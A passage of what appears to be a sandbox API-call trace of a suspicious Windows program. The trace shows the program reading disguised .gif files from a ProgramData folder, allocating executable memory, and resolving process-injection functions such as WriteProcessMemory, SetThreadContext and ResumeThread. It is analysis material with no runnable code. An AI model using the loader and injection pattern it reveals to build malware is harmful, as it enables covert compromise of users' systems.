[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0xedd70, cchData=256 | out: lpLCData="April") returned 6
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0xedd70, cchData=256 | out: lpLCData="May") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0xedd70, cchData=256 | out: lpLCData="May") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0xedd70, cchData=256 | out: lpLCData="Jun") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0xedd70, cchData=256 | out: lpLCData="June") returned 5
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0xedd70, cchData=256 | out: lpLCData="Jul") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0xedd70, cchData=256 | out: lpLCData="July") returned 5
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0xedd70, cchData=256 | out: lpLCData="Aug") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0xedd70, cchData=256 | out: lpLCData="August") returned 7
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0xedd70, cchData=256 | out: lpLCData="Sep") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0xedd70, cchData=256 | out: lpLCData="September") returned 10
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0xedd70, cchData=256 | out: lpLCData="Oct") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0xedd70, cchData=256 | out: lpLCData="October") returned 8
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0xedd70, cchData=256 | out: lpLCData="Nov") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0xedd70, cchData=256 | out: lpLCData="November") returned 9
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0xedd70, cchData=256 | out: lpLCData="Dec") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0xedd70, cchData=256 | out: lpLCData="December") returned 9
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0xeddc0, cchData=256 | out: lpLCData="$") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0xeddc0, cchData=256 | out: lpLCData="0") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0xeddc0, cchData=256 | out: lpLCData="0") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xedfb8, cchData=2 | out: lpLCData=",") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xedfb8, cchData=2 | out: lpLCData=".") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0xeddc0, cchData=256 | out: lpLCData="2") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xedfb8, cchData=2 | out: lpLCData="/") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0xedd78, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0xedd78, cchData=256 | out: lpLCData="1") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0xedd78, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0xedd78, cchData=256 | out: lpLCData="1") returned 2
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xedfb8, cchData=2 | out: lpLCData=":") returned 2
[0086.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0xeddc0, cchData=256 | out: lpLCData="AM") returned 3
[0086.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0xeddc0, cchData=256 | out: lpLCData="PM") returned 3
[0086.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0xeddc0, cchData=256 | out: lpLCData="0") returned 2
[0086.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xeddc0, cchData=256 | out: lpLCData="0") returned 2
[0086.050] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0xeddc0, cchData=256 | out: lpLCData="0") returned 2
[0086.050] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0xedfb8, cchData=2 | out: lpLCData=",") returned 2
[0086.050] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x758f0000
[0086.050] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0086.050] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0086.050] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0086.050] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0086.050] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0086.050] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0086.051] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0086.052] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0086.052] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0086.052] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0086.052] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0086.052] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0086.052] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xcc
[0086.052] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xd0
[0086.052] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd4
[0086.052] LoadStringW (in: hInstance=0x8f0000, uID=0xff32, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid time Offset string: %s") returned 0x1e
[0086.052] LoadStringW (in: hInstance=0x8f0000, uID=0xff31, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid time string: %s") returned 0x17
[0086.052] LoadStringW (in: hInstance=0x8f0000, uID=0xff30, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid date string: %s") returned 0x17
[0086.052] GetDC (hWnd=0x0) returned 0x2b010799
[0086.052] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.052] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.053] GetDC (hWnd=0x0) returned 0x2b010799
[0086.053] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0086.053] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.053] CreatePalette (plpal=0xedcf8) returned 0x520806f6
[0086.053] GetStockObject (i=7) returned 0x1b00017
[0086.053] GetStockObject (i=5) returned 0x1900015
[0086.053] GetStockObject (i=13) returned 0x18a002e
[0086.053] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.053] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0086.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0xedfd8 | out: phkResult=0xedfd8*=0xd8) returned 0x0
[0086.053] RegQueryValueExW (in: hKey=0xd8, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0xedfac, lpData=0x0, lpcbData=0xedfc4*=0x0 | out: lpType=0xedfac*=0x1, lpData=0x0, lpcbData=0xedfc4*=0xe) returned 0x0
[0086.053] RegQueryValueExW (in: hKey=0xd8, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0xedfc0, lpData=0x173288c, lpcbData=0xedfd0*=0xe | out: lpType=0xedfc0*=0x1, lpData="Tahoma", lpcbData=0xedfd0*=0xe) returned 0x0
[0086.053] RegCloseKey (hKey=0xd8) returned 0x0
[0086.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0xee005, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahoma", lpUsedDefaultChar=0x0) returned 6
[0086.053] GetCurrentThreadId () returned 0xf10
[0086.053] GetCurrentThreadId () returned 0xf10
[0086.053] GetCurrentThreadId () returned 0xf10
[0086.053] GetCurrentThreadId () returned 0xf10
[0086.053] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] GetCurrentThreadId () returned 0xf10
[0086.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="BTMEMO", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0086.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="BTMEMO", cchWideChar=6, lpMultiByteStr=0x899d24, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTMEMO", lpUsedDefaultChar=0x0) returned 6
[0086.054] GetProcAddress (hModule=0x8f0000, lpProcName="BTMEMO") returned 0x9d7bf0
[0086.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxa.gif", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38
[0086.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxa.gif", cchWideChar=38, lpMultiByteStr=0x8da964, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\programdata\\tempa\\marxvxinhhmxa.gif", lpUsedDefaultChar=0x0) returned 38
[0086.054] _lopen (lpPathName="c:\\programdata\\tempa\\marxvxinhhmxa.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmxa.gif"), iReadWrite=0) returned 0xd8
[0086.054] GetFileSize (in: hFile=0xd8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ec00
[0086.055] _hread (in: hFile=0xd8, lpBuffer=0x85c72c, lBytes=191488 | out: lpBuffer=0x85c72c*) returned 191488
[0086.058] _lclose (hFile=0xd8) returned 0x0
[0086.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxb.gif", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38
[0086.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxb.gif", cchWideChar=38, lpMultiByteStr=0x8da99c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\programdata\\tempa\\marxvxinhhmxb.gif", lpUsedDefaultChar=0x0) returned 38
[0086.058] _lopen (lpPathName="c:\\programdata\\tempa\\marxvxinhhmxb.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmxb.gif"), iReadWrite=0) returned 0xd8
[0086.058] GetFileSize (in: hFile=0xd8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2be00
[0086.059] _hread (in: hFile=0xd8, lpBuffer=0x8308fc, lBytes=179712 | out: lpBuffer=0x8308fc*) returned 179712
[0086.062] _lclose (hFile=0xd8) returned 0x0
[0086.062] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff50000
[0086.070] VirtualAlloc (lpAddress=0x400000, dwSize=0x5f000, flAllocationType=0x2000, flProtect=0x40) returned 0x0
[0086.070] VirtualAlloc (lpAddress=0x0, dwSize=0x5f000, flAllocationType=0x2000, flProtect=0x40) returned 0x160000
[0086.070] VirtualAlloc (lpAddress=0x160000, dwSize=0x5f000, flAllocationType=0x1000, flProtect=0x40) returned 0x160000
[0086.072] VirtualAlloc (lpAddress=0x160000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x40) returned 0x160000
[0086.072] VirtualAlloc (lpAddress=0x161000, dwSize=0x4cc00, flAllocationType=0x1000, flProtect=0x40) returned 0x161000
[0086.099] VirtualAlloc (lpAddress=0x1ae000, dwSize=0x1200, flAllocationType=0x1000, flProtect=0x40) returned 0x1ae000
[0086.099] VirtualAlloc (lpAddress=0x1b0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1b0000
[0086.099] VirtualAlloc (lpAddress=0x1b1000, dwSize=0x2200, flAllocationType=0x1000, flProtect=0x40) returned 0x1b1000
[0086.100] VirtualAlloc (lpAddress=0x1b4000, dwSize=0x5800, flAllocationType=0x1000, flProtect=0x40) returned 0x1b4000
[0086.100] VirtualAlloc (lpAddress=0x1ba000, dwSize=0x4e00, flAllocationType=0x1000, flProtect=0x40) returned 0x1ba000
[0086.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="kernel32.dll") returned 12
[0086.101] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.101] GetProcAddress (hModule=0x75370000, lpProcName="DeleteCriticalSection") returned 0x76f79ac5
[0086.101] GetProcAddress (hModule=0x75370000, lpProcName="LeaveCriticalSection") returned 0x76f67760
[0086.101] GetProcAddress (hModule=0x75370000, lpProcName="EnterCriticalSection") returned 0x76f677a0
[0086.101] GetProcAddress (hModule=0x75370000, lpProcName="InitializeCriticalSection") returned 0x76f7a149
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="LocalAlloc") returned 0x753c3363
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="GetVersion") returned 0x753b154e
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThreadId") returned 0x753bbb80
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="InterlockedDecrement") returned 0x753bbbf0
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="InterlockedIncrement") returned 0x753bbbc0
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="VirtualQuery") returned 0x753c76d6
[0086.102] GetProcAddress (hModule=0x75370000, lpProcName="WideCharToMultiByte") returned 0x753c450e
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="MultiByteToWideChar") returned 0x753c452b
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="lstrlenA") returned 0x753ba611
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="lstrcpynA") returned 0x753a8979
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="LoadLibraryExA") returned 0x753b47fa
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadLocale") returned 0x753b153c
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="GetStartupInfoA") returned 0x75371e10
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="GetProcAddress") returned 0x753c33d3
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleHandleA") returned 0x753bcf41
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleFileNameA") returned 0x753c33f6
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="GetLocaleInfoA") returned 0x753aadbf
[0086.103] GetProcAddress (hModule=0x75370000, lpProcName="GetCommandLineA") returned 0x753c98ff
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="FreeLibrary") returned 0x753bd9d0
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="FindFirstFileA") returned 0x753c2d89
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="FindClose") returned 0x753c0e62
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="ExitProcess") returned 0x753c214f
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="WriteFile") returned 0x753c1400
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="UnhandledExceptionFilter") returned 0x753ced38
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="RtlUnwind") returned 0x753a7f70
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="RaiseException") returned 0x753aeb60
[0086.104] GetProcAddress (hModule=0x75370000, lpProcName="GetStdHandle") returned 0x753c1e46
[0086.104] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=10, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="user32.dllll") returned 10
[0086.104] LoadLibraryW (lpLibFileName="user32.dll") returned 0x757b0000
[0086.105] GetProcAddress (hModule=0x757b0000, lpProcName="GetKeyboardType") returned 0x757fbfee
[0086.105] GetProcAddress (hModule=0x757b0000, lpProcName="LoadStringA") returned 0x757b66a7
[0086.105] GetProcAddress (hModule=0x757b0000, lpProcName="MessageBoxA") returned 0x7580ea11
[0086.105] GetProcAddress (hModule=0x757b0000, lpProcName="CharNextA") returned 0x757bc861
[0086.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="advapi32.dll") returned 12
[0086.105] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76da0000
[0086.105] GetProcAddress (hModule=0x76da0000, lpProcName="RegQueryValueExA") returned 0x76db48ef
[0086.105] GetProcAddress (hModule=0x76da0000, lpProcName="RegOpenKeyExA") returned 0x76db4907
[0086.105] GetProcAddress (hModule=0x76da0000, lpProcName="RegCloseKey") returned 0x76db469d
[0086.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="oleaut32.dll") returned 12
[0086.106] LoadLibraryW (lpLibFileName="oleaut32.dll") returned 0x758f0000
[0086.106] GetProcAddress (hModule=0x758f0000, lpProcName="SysFreeString") returned 0x758f3e59
[0086.106] GetProcAddress (hModule=0x758f0000, lpProcName="SysReAllocStringLen") returned 0x758f7810
[0086.106] GetProcAddress (hModule=0x758f0000, lpProcName="SysAllocStringLen") returned 0x758f45d2
[0086.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="kernel32.dll") returned 12
[0086.106] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.106] GetProcAddress (hModule=0x75370000, lpProcName="TlsSetValue") returned 0x753bda88
[0086.106] GetProcAddress (hModule=0x75370000, lpProcName="TlsGetValue") returned 0x753bda70
[0086.106] GetProcAddress (hModule=0x75370000, lpProcName="TlsFree") returned 0x753c13b8
[0086.107] GetProcAddress (hModule=0x75370000, lpProcName="TlsAlloc") returned 0x753c35a1
[0086.107] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0086.107] GetProcAddress (hModule=0x75370000, lpProcName="LocalAlloc") returned 0x753c3363
[0086.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="advapi32.dll") returned 12
[0086.107] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76da0000
[0086.107] GetProcAddress (hModule=0x76da0000, lpProcName="RegQueryValueExA") returned 0x76db48ef
[0086.107] GetProcAddress (hModule=0x76da0000, lpProcName="RegOpenKeyExA") returned 0x76db4907
[0086.107] GetProcAddress (hModule=0x76da0000, lpProcName="RegCloseKey") returned 0x76db469d
[0086.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="kernel32.dll") returned 12
[0086.107] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.107] GetProcAddress (hModule=0x75370000, lpProcName="lstrcpyA") returned 0x753b9793
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="WriteProcessMemory") returned 0x753ac1de
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="WriteFile") returned 0x753c1400
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="WaitForSingleObject") returned 0x753bba90
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="VirtualQuery") returned 0x753c76d6
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAllocEx") returned 0x753ac1b6
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="TerminateProcess") returned 0x753b2331
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="Sleep") returned 0x753bba46
[0086.108] GetProcAddress (hModule=0x75370000, lpProcName="SizeofResource") returned 0x753b3e7f
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadLocale") returned 0x753d88e6
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadContext") returned 0x75400193
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="SetFilePointer") returned 0x753bdb36
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="SetEvent") returned 0x753bbccc
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="SetErrorMode") returned 0x753c4a51
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="SetEndOfFile") returned 0x753b2319
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="ResumeThread") returned 0x753b0f1c
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="ResetEvent") returned 0x753bbcb4
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="ReadProcessMemory") returned 0x753ac1ce
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="ReadFile") returned 0x753b96fb
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="MulDiv") returned 0x753bb7a0
[0086.109] GetProcAddress (hModule=0x75370000, lpProcName="LockResource") returned 0x753afd29
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="LoadResource") returned 0x753b984d
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="LoadLibraryA") returned 0x753c395c
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="LeaveCriticalSection") returned 0x76f67760
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="InitializeCriticalSection") returned 0x76f7a149
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="GlobalUnlock") returned 0x753b9d50
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="GlobalReAlloc") returned 0x753aec90
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="GlobalHandle") returned 0x753ba0c4
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="GlobalLock") returned 0x753b9e05
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0086.110] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFindAtomA") returned 0x753d6a4b
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GlobalDeleteAtom") returned 0x753af16c
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAddAtomA") returned 0x753a83ea
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetVersion") returned 0x753b154e
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetTickCount") returned 0x753bba60
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadLocale") returned 0x753b153c
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadContext") returned 0x753d0cc1
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetSystemInfo") returned 0x753c3728
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetStringTypeExA") returned 0x753a689f
[0086.111] GetProcAddress (hModule=0x75370000, lpProcName="GetStdHandle") returned 0x753c1e46
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetProcAddress") returned 0x753c33d3
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleHandleA") returned 0x753bcf41
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleFileNameA") returned 0x753c33f6
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetLocaleInfoA") returned 0x753aadbf
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetLocalTime") returned 0x753ba90e
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetFullPathNameA") returned 0x753c3735
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceA") returned 0x753cd7d2
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetDateFormatA") returned 0x753d5625
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThreadId") returned 0x753bbb80
[0086.112] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcessId") returned 0x753bcac4
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="GetCPInfo") returned 0x753c1e2e
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="GetACP") returned 0x753c39aa
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FreeResource") returned 0x753af1bd
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="InterlockedExchange") returned 0x753bbf0a
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FreeLibrary") returned 0x753bd9d0
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FormatMessageA") returned 0x753d8868
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FindResourceA") returned 0x753ba05b
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FindFirstFileA") returned 0x753c2d89
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FindClose") returned 0x753c0e62
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FileTimeToLocalFileTime") returned 0x753c2004
[0086.113] GetProcAddress (hModule=0x75370000, lpProcName="FileTimeToDosDateTime") returned 0x753b2ce1
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="EnumCalendarInfoA") returned 0x753d6180
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="EnterCriticalSection") returned 0x76f677a0
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="DeleteCriticalSection") returned 0x76f79ac5
